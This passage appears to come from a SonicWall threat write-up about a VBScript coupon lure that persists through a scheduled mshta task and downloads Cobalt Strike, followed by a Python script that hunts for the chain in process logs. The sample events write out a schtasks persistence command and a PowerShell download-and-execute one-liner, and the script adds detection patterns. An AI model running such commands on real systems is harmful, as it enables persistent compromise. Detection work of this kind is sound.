This script checks whether it is running in a virtual environment and terminates if it is. It then spawns schtasks.exe to add a scheduled task named "GooleServices_updaters".

The scheduled task tries to visit a page on pastebin every hour using mshta.exe, the Windows utility that runs HTML Applications (HTA files). This page contains another PowerShell script.

This PowerShell script launches another instance of PowerShell, which then downloads a Cobalt Strike client.

The downloaded Cobalt Strike file has the EICAR test-file string appended to it, possibly in an attempt to throw off malware detection (a scanner that classifies the file by the EICAR match alone would report it as the harmless test file).

Cobalt Strike is commercial threat-emulation software designed for penetration testers. Once its client is running, the attacker can take control of the victim's machine and move further into the network by issuing a wide array of commands, which is why it has become popular with malware authors as well.
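The chain above (document, VBScript, schtasks, mshta, nested PowerShell download) leaves a distinctive parent/child process trail, so here is an added example of hunting logic run over process-creation events. This is not SonicWall's detection code; the events are constructed Sysmon-style records trimmed to three fields, and the file paths, hostnames, URLs and the encoded command are placeholders. The paste-site host list and download keywords are assumptions a practitioner would tune to their environment.

```python
"""Hunt for the document -> VBScript -> schtasks -> mshta -> PowerShell chain.

Added example, not SonicWall's detection logic. SAMPLE_EVENTS are constructed
Sysmon-style process-creation records; paths, URLs and the encoded command
are placeholders. PASTE_HOSTS and DOWNLOAD_RE are assumptions to tune locally.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Assumption: paste sites commonly abused to host stage-two scripts.
PASTE_HOSTS = {"pastebin.com", "paste.ee", "hastebin.com"}
# Assumption: PowerShell download primitives and encoded-command switch.
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|-enc\w*\s)",
    re.IGNORECASE,
)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev):
    """Return the names of every rule a single process-creation event trips."""
    parent = basename(ev["ParentImage"])
    image = basename(ev["Image"])
    cmd = ev["CommandLine"]
    lower = cmd.lower()
    urls = URL_RE.findall(cmd)
    hits = []
    # Rule 1: an Office document launching a script host (the "click the coupon" step).
    if parent in OFFICE and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: schtasks creating a task whose action is mshta pointed at a remote URL.
    if image == "schtasks.exe" and "/create" in lower and "mshta" in lower and urls:
        hits.append("schtasks_mshta_remote_url")
    # Rule 3: mshta handing off to PowerShell (the HTA page is just a launcher).
    if parent == "mshta.exe" and image in POWERSHELL:
        hits.append("mshta_spawns_powershell")
    # Rule 4: PowerShell spawning PowerShell that downloads the next stage.
    if parent in POWERSHELL and image in POWERSHELL and DOWNLOAD_RE.search(cmd):
        hits.append("powershell_nested_download")
    # Rule 5: any command line fetching content from a paste site.
    if any((urlparse(u).hostname or "").lower() in PASTE_HOSTS for u in urls):
        hits.append("paste_site_url")
    return hits


def triage(events):
    """[(index, hits)] for every event that trips at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            flagged.append((i, hits))
    return flagged


def chain_score(events):
    """Number of distinct rules fired across the event set; 4+ suggests the full chain."""
    return len({rule for _, hits in triage(events) for rule in hits})


# Constructed sample events (placeholder paths, URLs and encoded command).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\AppData\Local\Temp\Coupon code .vbs"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc hourly /tn GooleServices_updaters /tr "mshta.exe https://pastebin.com/raw/PLACEHOLDER" /f'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc QQBCAEMA"},   # placeholder: UTF-16LE "ABC"
    {"ParentImage": PS,
     "Image": PS,
     "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('https://cdn.example/stage2')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\victim\notes.txt"},   # benign control
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(i, basename(SAMPLE_EVENTS[i]["Image"]), hits)
    print("distinct rules fired:", chain_score(SAMPLE_EVENTS))
```

Each rule is weak on its own (schtasks and mshta are legitimate tools), so the value is in the combination: several distinct rules firing on one host within a short window is what singles out this chain from ordinary administration.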

Because of the prevalence of these types of attacks, especially during the holiday season, we urge users to remain vigilant and cautious with any unsolicited email carrying unexpected document attachments, particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat with the following signature:

  • GAV: Coupon.VBS (Trojan)